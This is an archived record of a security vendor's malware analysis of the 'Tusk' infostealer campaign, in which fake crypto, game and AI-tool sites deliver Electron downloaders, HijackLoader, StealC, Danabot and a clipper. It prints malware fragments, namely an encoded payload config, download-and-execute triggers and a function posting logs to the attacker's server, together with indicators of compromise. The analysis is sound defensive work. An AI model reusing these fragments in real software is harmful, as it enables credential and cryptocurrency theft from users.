{
	"id": "229cbc38-7100-4985-9404-d4fd319e98be",
	"created_at": "2026-04-06T00:08:00.811528Z",
	"updated_at": "2026-04-10T03:20:01.609406Z",
	"deleted_at": null,
	"sha1_hash": "7e1ae48e305b41e116009495c08f19a37c4ed125",
	"title": "Tusk: unraveling a complex infostealer campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3144536,
	"plain_text": "Tusk: unraveling a complex infostealer campaign\r\nBy Elsayed Elrefaei\r\nPublished: 2024-08-15 · Archived: 2026-04-05 17:57:47 UTC\r\nSummary\r\nKaspersky Global Emergency Response Team (GERT) has identified a complex campaign, consisting of multiple sub-campaigns orchestrated by Russian-speaking cybercriminals. The sub-campaigns imitate legitimate projects, slightly\r\nmodifying names and branding and using multiple social media accounts to increase their credibility. In our analysis we\r\nobserved that all the active sub-campaigns host the initial downloader on Dropbox. This downloader is responsible for\r\ndelivering additional malware samples to the victim’s machine, which are mostly infostealers (Danabot and StealC) and\r\nclippers. Besides this, the actors use phishing to trick users into providing additional sensitive information, such as\r\ncredentials, which can then be sold on the dark web or used to gain unauthorized access to their gaming accounts and\r\ncryptocurrency wallets and drain their funds directly.\r\nWe identified three active sub-campaigns (at the time of analysis) and 16 inactive sub-campaigns related to this activity. We\r\ndubbed it “Tusk”, as the threat actor uses the word “Mammoth” in log messages of initial downloaders — at least in the\r\nthree active sub-campaigns we analyzed. “Mammoth” is slang used by Russian-speaking threat actors to refer to victims.\r\nMammoths used to be hunted by ancient people and their tusks were harvested and sold.\r\nAnalysis of the inactive sub-campaigns suggests that these are either old campaigns or campaigns that haven’t started yet. In\r\nthis post, we analyze the three most recently active sub-campaigns. Here is the timeline for the sub-campaigns in question:\r\nCampaign timeline\r\nFirst sub-campaign (TidyMe)\r\nIn this campaign the actor simulated peerme.io, a platform for the creation and management of decentralized autonomous\r\norganizations (DAOs) on the MultiversX blockchain. 
It aims to empower crypto communities and projects by providing\r\ntools for governance, funding, and collaboration within a decentralized framework. The malicious website is tidyme[.]io.\r\nFirst sub-campaign: malicious and original sites\r\nAs you can see in the image above, the malicious website contains a “Download” button instead of the “Create your Team\r\nnow” button on the legitimate website. Clicking this button sends a request to the webserver with User-Agent as an\r\nhttps://securelist.com/tusk-infostealers-campaign/113367/\r\nPage 1 of 14\n\nargument. The webserver uses this data to determine which version of the malicious file to send to the victim. The details are\r\nshown in the diagram below:\r\nMalicious webserver routine to download the appropriate malware version depending on the user’s operating system\r\nThis campaign has several malware samples for macOS and Windows, both hosted on Dropbox. In this post we will explore\r\nWindows samples only.\r\nIn addition to distributing malware, this campaign involves victims connecting their cryptocurrency wallets directly through\r\nthe campaign’s website. To investigate further, we created a test wallet with a small balance and linked it to the site.\r\nHowever, no withdrawal transactions were initiated in the course of this study. The purpose of this action was to expose the\r\nthreat actor’s cryptocurrency wallet address for subsequent blockchain analysis.\r\nDuring our investigation, the threat actors transitioned their infrastructure to the domains tidymeapp[.]io and tidyme[.]app.\r\nThe domain tidymeapp[.]io now hosts an updated version of the initial downloader, incorporating additional anti-analysis\r\ntechniques. 
Despite these changes, its primary objective remains the same: to download and execute subsequent stages.\r\nAnalysis of these new samples is still underway; nevertheless, their IoCs are included in the IoCs section in this report.\r\nDetails of the analysis for the previous samples from tidyme[.]io are provided below.\r\nInitial downloader (TidyMe.exe)\r\nThis sample is an Electron application. After its execution, a CAPTCHA form is displayed and the victim must enter the\r\ncode to proceed. No malicious activities will be carried out until the victim passes the CAPTCHA check, suggesting that the\r\nthreat actors added it to prevent execution using automatic dynamic analysis tools (e.g. sandboxes).\r\nCAPTCHA form\r\nIt’s worth mentioning that the CAPTCHA is handled internally in the JavaScript file captcha.js as opposed to being handled\r\nby a third party, which suggests the attackers’ intent of making sure the victim executes the sample.\r\nAfter the user passes the CAPTCHA check, the sample launches the main application interface which resembles a profile\r\npage. But even if the user enters some information here, nothing will happen. At the same time, the sample begins\r\ndownloading the two additional malicious files in the background, which are then executed.\r\nMain interface for TidyMe.exe\r\nDownloader routine\r\nThe tidyme.exe sample contains a configuration file called config.json which contains base64-encoded URLs and a\r\npassword for archived data decompression, which is used to download the second-stage payloads. 
Here is the content of the\r\nfile:\r\n{\r\n\"archive\": \"aHR0cHM6Ly93d3cuZHJvcGJveC5jb20vc2NsL2ZpL2N3NmpzYnA5ODF4eTg4dHprM29ibS91cGRhdGVsb2FkLnJhcj9ybGtleT04N2\r\n\"password\": \"newfile2024\",\r\n\"bytes\": \"aHR0cDovL3Rlc3Rsb2FkLnB5dGhvbmFueXdoZXJlLmNvbS9nZXRieXRlcy9m\"\r\n}\r\nThe table below lists the decoded URLs:\r\nField name Decoded value\r\nArchive hxxps[:]//www.dropbox[.]com/scl/fi/cw6jsbp981xy88tzk3obm/updateload.rar?rlkey=87g969em599vnoslcglyo97fa\u0026st=1p7dopsl\u0026dl=1\r\nBytes hxxp[:]//testload.pythonanywhere[.]com/getbytes/f\r\nThe main downloader functionality is stored in the preload.js file in two functions, downloadAndExtractArchive and loadFile.\r\nThe function downloadAndExtractArchive retrieves the field archive from the configuration file, which is an encoded\r\nDropbox link, decodes it and stores the file from Dropbox to the path %TEMP%/archive-\u003cRANDOM_STRING\u003e. The\r\ndownloaded file is a password-protected RAR file which will be extracted with the value of the field password in the\r\nconfiguration file, then all .exe files from this archive are executed.\r\nThe loadFile function retrieves the field bytes from the configuration file, decodes it using base64, and sends a GET request\r\nto the resulting URL. The response contains a byte array which will be converted to bytes and written to the path\r\n%TEMP%/\u003cMD5_HASH_OF_CURRENT_TIME\u003e.exe. Following a successful download, this function decodes the\r\nfile, appends 750000000 bytes to its end and then executes it.\r\nThese two functions, in addition to other functions, are exported, which allows the rendering processes to call them in the\r\nfile named script.js with some delay after the user passes the CAPTCHA check. 
Here is the code responsible for calling\r\nthese functions:\r\nsetTimeout(() =\u003e {\r\nwindow.api.downloadAndExtractArchive()\r\n}, 10000)\r\nsetTimeout(() =\u003e {\r\nwindow.api.loadFile()\r\n}, 100000)\r\n...\r\nIn addition to the two functions above, the sample contains a function called sendRequest. This function is responsible for\r\nsending log messages to the threat actor’s C2 server using HTTP POST messages to the URL\r\nhxxps[:]//tidyme[.]io/api.php. Below is the function’s code:\r\nasync function sendRequest(data) {\r\nconst formData = new URLSearchParams();\r\nObject.entries(data).forEach(([key, value]) =\u003e {\r\nformData.append(key, value);\r\n});\r\nconst response = await fetch('https://tidyme.io/api.php', {\r\nmethod: 'POST',\r\nheaders: {\r\n'Content-Type': 'application/x-www-form-urlencoded',\r\n},\r\nbody: formData,\r\n});\r\nreturn response.json();\r\n}\r\nHere is an example of the data which was passed to the sendRequest function as arguments:\r\nconst { v4: uuidv4 } = require('uuid');\r\nconst randomUUID = uuidv4();\r\nlet data = {\r\nkey: \"aac1ff44\",\r\ntype: \"customlog\",\r\ncode: randomUUID,\r\nmessage: \"Нет действия...\"\r\n};\r\nThe messages sent to the C2 server are in Russian; the table below shows the messages along with the English translation:\r\nOriginal message Translated message\r\nОшибка при создании буфера из архивных данных: Error when creating a buffer from archived data:\r\nНет действия… No action…\r\nСоздаю директорию. I’m creating a directory.\r\nПолучил файл. I received the file.\r\nЗаписал файл в директорию. I wrote the file to the directory.\r\nUnboxing подъехал. Unboxing has arrived.\r\nОткрыл файл. Opened the file.\r\nНе смог открыть файл. Error: Couldn’t open the file. 
Error:\r\nГлобальная ошибка: Global error:\r\nНет действия… No action…\r\nВыполняю повторный стук. I knock again.\r\nНе удалось получить файл с сайта! Перезапускаюсь. Failed to get file from site! I’m restarting.\r\nФайл успешно записан на устройство. The file was successfully written to the device.\r\nРаздуваю файл. I’m inflating the file.\r\nОткрыл файл. Opened the file.\r\nНеудачное открытие файла, через 4 минуты повторяю…: Unsuccessful file opening, after 4 minutes I repeat…:\r\nГлобальная ошибка: Global error:\r\nМамонт открыл лаунчер… Mammoth opened the launcher…\r\nМамонт свернул лаунчер… Mammoth collapsed the launcher…\r\nМамонт закрыл лаунчер… Mammoth closed the launcher…\r\nThe following diagram shows the download routine for this sample:\r\nInitial downloader routine – TidyMe.exe\r\nIn this campaign, both updateload.exe and bytes.exe are the same file with the following hashes:\r\nMD5: B42F971AC5AAA48CC2DA13B55436C277\r\nSHA1: 5BF729C6A67603E8340F31BAC2083F2A4359C24B\r\nSHA256: C990A578A32D545645B51C2D527D7A189A7E09FF7DC02CEFC079225900F296AC\r\nPayload (updateload.exe and bytes.exe)\r\nThis sample utilizes HijackLoader, a modular loader with different capabilities such as UAC bypass, various process\r\ninjection techniques, and inline API hooking evasion. After updateload.exe (or bytes.exe) is dropped and executed, it starts a\r\nseries of process injections starting with injecting shellcode into cmd.exe, then deletes itself, after which the malicious code\r\ninjected into cmd.exe injects another shellcode into explorer.exe. Both shellcodes are the 32-bit version. As a result of the\r\ninjection chain, the final stage is executed in the context of the explorer.exe process, which is a variant of the infostealer\r\nmalware family StealC. 
The final payload starts communicating with the threat actor’s C2 server, downloading additional\r\nlegitimate DLLs to be used during the collection and sending of information about the infected system, including the\r\nfollowing:\r\nHWID (unique ID for the infected system calculated by the malware from C drive serial number);\r\nBuild Number (meowsterioland4);\r\nNetwork Info\r\nIP;\r\nCountry;\r\nSystem Summary\r\nHardware ID from the operating system;\r\nOS;\r\nArchitecture;\r\nUsername;\r\nLocal time;\r\nInstalled apps;\r\nAll users;\r\nCurrent user;\r\nProcess list;\r\nScreenshot.\r\nThen it will start requesting configurations from the C2 server, which is a public IP, for the data to be collected. The\r\nfollowing table lists the configurations along with their description:\r\nConfiguration name Description\r\nbrowsers Data to be collected from browsers\r\nplugins Data to be collected from browser extensions\r\nfplugin N/A\r\nwallets Data to be collected for the wallet’s desktop applications\r\nThe diagram below illustrates the execution steps for this sample:\r\nFirst sub-campaign – updateload.exe\r\nIdentifying additional sub-campaigns\r\nHaving completed our analysis of the first sub-campaign, we conducted cyberthreat intelligence (CTI) and OSINT activities\r\naiming to collect as much information as possible related to the threat actor and this specific campaign. Looking at the DNS\r\nrecords for the first campaign (TidyMe), we identified MX records with the value _dc-mx.bf442731a463[.]tidyme[.]io.\r\nResolving this domain to an A record returns the IP 79.133.180[.]213. Utilizing Kaspersky Threat Intelligence Portal (TIP),\r\nwe were able to identify all historical and present domains associated with this IP. 
Below is a list of all the domains:\r\nDomains\r\ntidyme[.]io\r\nruneonlineworld[.]io\r\nvoico[.]io\r\nastrosounsports[.]shop\r\nbatverssaports[.]shop\r\ndintrinnssports[.]shop\r\ndustfightergame[.]com\r\nedvhukkkmvgcct[.]shop\r\ngurunsmilrsports[.]shop\r\nizxxd[.]top\r\npartyroyale[.]fun\r\npartyroyale[.]games\r\npartyroyaleplay[.]com\r\npartyroyaleplay[.]io\r\nrefvhnhkkolmjbg[.]shop\r\nsinergijiasport[.]shop\r\nsupme[.]io\r\nvinrevildsports[.]shop\r\nwuwelej[.]top\r\nFrom the domains above, only the first three were active during our analysis. We already explored tidyme[.]io, so we’ll\r\ndiscuss the other two active sub-campaigns next.\r\nIn addition to the link between the domains and the IP, all three active campaigns imitate legitimate projects and contain a\r\ndownload link to an initial downloader malware. The diagram below shows the correlation between the different campaigns:\r\nSub-campaigns correlation\r\nSecond sub-campaign (RuneOnlineWorld)\r\nIn this campaign, the threat actor was simulating the website of an MMO game. The original website domain is\r\nriseonlineworld.com, while the malicious website is runeonlineworld[.]io.\r\nSecond sub-campaign: malicious and original sites\r\nThe malicious website contains a download link for the initial downloader, imitating the game launcher. The downloader is\r\nhosted on Dropbox and it follows the same logic described in the TidyMe section (the first sub-campaign) to obtain the\r\nappropriate downloader for the victim’s operating system. The sample name is RuneOnlineWorld.exe.\r\nInitial downloader (RuneOnlineWorld.exe)\r\nThis sample is also an Electron application with mostly the same structure and logic as the initial downloader in the first\r\nsub-campaign. 
There are different URLs in the configuration file, but otherwise most of the changes involve the main\r\ninterface of the application: it resembles a login page rather than a profile page. Moreover, the login page does actually\r\nprocess the entered data.\r\nFirst, the password is checked for complexity. If the check is passed, the username and password are sent to the C2. Then a\r\nloading page is displayed which is essentially a mockup to give the background tasks enough time to download the\r\nadditional malicious files. The following diagram shows the steps taken by the downloader:\r\nInitial downloader routine – RuneOnlineWorld.exe\r\nFirst payload (updateload.exe)\r\nIn the RuneOnlineWorld campaign the two payloads are no longer the same file. Updateload.exe utilizes HijackLoader and\r\ninjects code into multiple legitimate programs to evade detection. It starts by injecting code into cmd.exe, then into explorer.exe.\r\nAfter that, the malicious code injected into explorer.exe starts communicating with multiple C2 servers to download\r\nadditional malicious DLL and MSI files and save them to the path C:\\Users\\\u003cUSERNAME\u003e\\Appdata\\. After downloading\r\nthe malicious files, explorer.exe executes the MSI files using msiexec.exe and the DLL files using rundll32.exe. The final\r\nstage for this sample is multiple infostealers from the malware families Danabot and StealC (injected into explorer.exe).\r\nThe diagram below shows the execution routine for this sample:\r\nSecond sub-campaign – updateload.exe\r\nSecond payload (bytes.exe)\r\nThis sample also uses HijackLoader to evade detection, unpacks different stages of the payload and injects them into\r\nlegitimate processes. First, it creates and injects malicious code into cmd.exe, which injects code into explorer.exe and then\r\ninto OpenWith.exe — a legitimate Windows process. 
The malicious code injected into OpenWith.exe downloads the next\r\nstage from the threat actor’s C2 (another public IP), decodes it and injects it into another OpenWith.exe instance. In this\r\nstage, the payload downloads six files to the directory %APPDATA%\\AD_Security\\ and creates a scheduled task named\r\nFJ_load which will execute the file named madHcCtrl.exe at login for persistence. Here is a list of files downloaded by\r\nthis stage:\r\nAll of these DLL and EXE files are legitimate, except madHcNet32.dll. The malicious files wickerwork.indd and\r\nbufotenine.yml contain encrypted data.\r\nThe following diagram shows the steps taken by this sample to extract the final payload:\r\nSecond sub-campaign – bytes.exe\r\nmadHcNet32.dll\r\nmadHcCtrl.exe loads and executes madHcNet32.dll, which, in turn, utilizes HijackLoader to extract and execute the final\r\npayload. After execution, madHcCtrl.exe injects the next stage into cmd.exe, then the final stage is injected into explorer.exe.\r\nThe final payload is clipper malware written in Go. This sample is based on open-source clipper malware. The following\r\ndiagram shows the execution steps for this sample:\r\nSecond sub-campaign – madHcNet32.dll\r\nThe clipper monitors the clipboard data. If a cryptocurrency wallet address is copied to the clipboard, it substitutes it with\r\nthe following one:\r\nBTC: 1DSWHiAW1iSFYVb86WQQUPn57iQ6W1DjGo\r\nIn addition, the sample contains unique strings such as the ones below:\r\nC:/Users/Helheim/\r\nC:/Users/Helheim/Desktop/clipper no autorun/mainTIMER.go\r\nWhile searching for samples that contain the same strings, we identified additional samples with different wallet addresses:\r\nETH: 0xaf0362e215Ff4e004F30e785e822F7E20b99723A\r\nBTC: bc1qqkvgqtpwq6g59xgwr2sccvmudejfxwyl8g9xg0\r\nWe identified some transactions on the second and third wallet addresses. 
There were no transactions related to the first\r\nwallet address at the time of writing this post.\r\nThe second wallet was seen active from March 4 to July 31 and received a total of 9.137 ETH. The third one was active\r\nbetween April 2 and August 6 with 0.0209 BTC received in total. Note that these addresses were only observed in the\r\nclipper malware. This campaign also utilizes infostealers to steal software-based cryptocurrency wallets which could be used\r\nto gain access to the victim’s funds, although we have not seen such activity. In addition, the infostealers collect credentials\r\nfrom browsers and other sources which could allow the threat actor to gain access to other services used by the victim (e.g.\r\nonline banking systems) or sell the stolen data on the dark web.\r\nThird sub-campaign (Voico)\r\nIn this campaign, the threat actor was simulating an AI translator project named YOUS. The original website is yous.ai,\r\nwhile the malicious website is voico[.]io:\r\nThird sub-campaign: malicious and original sites\r\nJust like the previous two sub-campaigns, the malicious website contains a download link for the initial downloader\r\nimitating the application. The downloader is hosted on Dropbox and follows the same logic described in the first sub-campaign to download the appropriate downloader for the victim’s operating system. During our investigation, the malicious\r\nwebsite of this campaign ceased to exist. The sample name is Voico.exe.\r\nInitial downloader (Voico.exe)\r\nThis sample is also an Electron application with mostly the same structure as the initial downloaders in the previous two\r\nsub-campaigns. The downloader logic also remains the same. 
Most of the changes involve the main interface of the\r\napplication, and different URLs are contained in the configuration file.\r\nVoico.exe main interface\r\nIn addition to these changes, the sample prompts the victim to fill in a registration form, which doesn’t send the data to the\r\nC2. Instead, it passes the user’s credentials to the console.log() function:\r\n// Теперь вы можете использовать эти значения для дальнейшей обработки или отправки на сервер\r\n// \u003cTranslation\u003e: Now you can use these values for further processing or sending to the server\r\nconsole.log('Name:', name);\r\nconsole.log('Username:', username);\r\nconsole.log('Native Language:', nativeLanguage);\r\nconsole.log('Voice:', voice);\r\nconsole.log('Password:', password);\r\nThe following diagram shows the execution routine for this sample:\r\nVoico.exe execution routine\r\nBoth samples in this campaign (updateload.exe and bytes.exe) have very similar behavior to the updateload.exe sample\r\nfrom the second sub-campaign.\r\nPayload (updateload.exe and bytes.exe)\r\nThese samples have similar behavior to the updateload.exe sample from the second sub-campaign with one difference: the\r\nStealC malware downloaded by them communicates with a different C2 server. Other than that, the whole routine from the\r\nupdateload.exe and bytes.exe execution to the final payload execution is the same. Here is a diagram of the execution\r\nroutine for these samples:\r\nThird sub-campaign – updateload.exe \u0026 bytes.exe\r\nPossible other sub-campaigns\r\nDuring the analysis of this campaign, the analyzed samples were hosted at the following paths on the attacker website:\r\nhttp[:]//testload.pythonanywhere.com/getbytes/f and http[:]//testload.pythonanywhere.com/getbytes/m. We didn’t find any\r\nother resources used in the current sub-campaigns (which doesn’t mean they won’t appear in the future). 
However, we\r\nnoticed other samples hosted in different paths, unrelated to the ongoing sub-campaigns. The following is a list of paths on\r\nthe PythonAnywhere website where these samples are hosted:\r\nhttp[:]//testload.pythonanywhere.com/getbytes/s\r\nhttp[:]//testload.pythonanywhere.com/getbytes/h\r\nThe hashes of the files in the new paths are already included in the IoCs list below.\r\nConclusion\r\nThe campaign uncovered in this report demonstrates the persistent and evolving threat posed by cybercriminals who are\r\nadept at mimicking legitimate projects to deceive victims. By exploiting the trust users place in well-known platforms, these\r\nattackers effectively deploy a range of malware designed to steal sensitive information, compromise systems, and ultimately\r\nachieve financial gain.\r\nThe reliance on social engineering techniques such as phishing, coupled with multistage malware delivery mechanisms,\r\nhighlights the advanced capabilities of the threat actors involved. Their use of platforms like Dropbox to host initial\r\ndownloaders, alongside the deployment of infostealer and clipper malware, points to a coordinated effort to evade detection\r\nand maximize the impact of their operations. The commonalities between different sub-campaigns and the shared\r\ninfrastructure across them further suggest a well-organized operation, potentially tied to a single actor or group with\r\nspecific financial motives. Our detailed analysis of the three active sub-campaigns, from the initial downloader routines to\r\nthe final payloads, reveals a complex chain of attacks designed to penetrate both Windows and macOS environments.\r\nIn addition to the active sub-campaigns, the discovery of 16 inactive sub-campaigns highlights the dynamic and adaptable\r\nnature of the threat actor’s operations. 
These inactive sub-campaigns, which may represent either older campaigns that have\r\nbeen retired or new ones that have not yet been launched, illustrate the threat actor’s ability to rapidly create and deploy new\r\nmalicious operations, targeting trending topics at the time of the campaign. This rapid turnover suggests a well-resourced and\r\nagile adversary, capable of quickly shifting tactics and infrastructure to avoid detection and maintain the effectiveness of\r\ntheir campaigns. The presence of these dormant campaigns also indicates that the threat actor is likely to continue evolving\r\ntheir strategies, potentially reactivating these sub-campaigns or launching entirely new ones in the near future. This\r\nreinforces the need for continuous monitoring and proactive defense strategies to stay ahead of these evolving threats.\r\nIf your company has experienced a cybersecurity incident that requires an immediate response, contact Kaspersky Incident\r\nResponse service.\r\nIndicators of Compromise\r\nURLs to third party services\r\nNetwork IoCs\r\nHost IoCs\r\nHashes for malicious files\r\nHashes for legitimate files used in the campaigns\r\nCryptocurrency wallet addresses\r\nCrypto Wallet Address\r\nBTC 1DSWHiAW1iSFYVb86WQQUPn57iQ6W1DjGo\r\nBTC 
bc1qqkvgqtpwq6g59xgwr2sccvmudejfxwyl8g9xg0\r\nETH 0xaf0362e215Ff4e004F30e785e822F7E20b99723A\r\nSource: https://securelist.com/tusk-infostealers-campaign/113367/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://securelist.com/tusk-infostealers-campaign/113367/"
	],
	"report_names": [
		"113367"
	],
	"threat_actors": [],
	"ts_created_at": 1775434080,
	"ts_updated_at": 1775791201,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7e1ae48e305b41e116009495c08f19a37c4ed125.pdf",
		"text": "https://archive.orkl.eu/7e1ae48e305b41e116009495c08f19a37c4ed125.txt",
		"img": "https://archive.orkl.eu/7e1ae48e305b41e116009495c08f19a37c4ed125.jpg"
	}
}